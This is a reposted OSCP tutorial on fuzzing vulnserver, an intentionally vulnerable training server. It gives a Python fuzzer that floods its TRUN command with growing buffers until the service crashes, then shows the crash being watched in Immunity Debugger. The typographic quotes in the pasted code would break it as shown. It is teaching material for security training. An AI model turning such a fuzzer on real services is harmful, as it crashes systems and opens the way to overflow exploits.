首页 > 其他 > 详细

OSCP Security Technology - Fuzzing

时间:2021-06-26 23:38:34      阅读:26      评论:0      收藏:0      [点我收藏+]

OSCP Security Technology - Fuzzing

Download vulnserver from the grey corner website.

https://thegreycorner.com/vulnserver.html

技术分享图片

技术分享图片

Download immunity debugger from here.

https://www.immunityinc.com/products/debugger/

nc -nv 192.168.2.21 9999

Kali

技术分享图片

Vulserver

技术分享图片

nano fuzzer.py
chmod 777 fuzzer.py
./fuzzer.py
#!/usr/bin/python
import socket
import sys

buffer=["A"]
counter=100
while len(buffer) <= 30:
    buffer.append("A"*counter)
    counter=counter+200

for string in buffer:
    print "Fuzzing vulnserver with %s bytes" % len(string)
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((‘192.168.2.21‘,9999))
    s.send((‘TRUN /.:/‘ + string))
    s.close()

Create and run the fuzzer script.

技术分享图片

The vulserver is crashed now.

技术分享图片

Debug and watch what will happen.

Install and open Immunity Debugger.

技术分享图片

Attach vulnserver.

技术分享图片

Run the debugger.

技术分享图片

Run the fuzzer.py script on Kali Linux again.

技术分享图片

The vulnserver is crashed and the debugger is paused.

技术分享图片

OSCP Security Technology - Fuzzing

原文:https://www.cnblogs.com/keepmoving1113/p/14939481.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!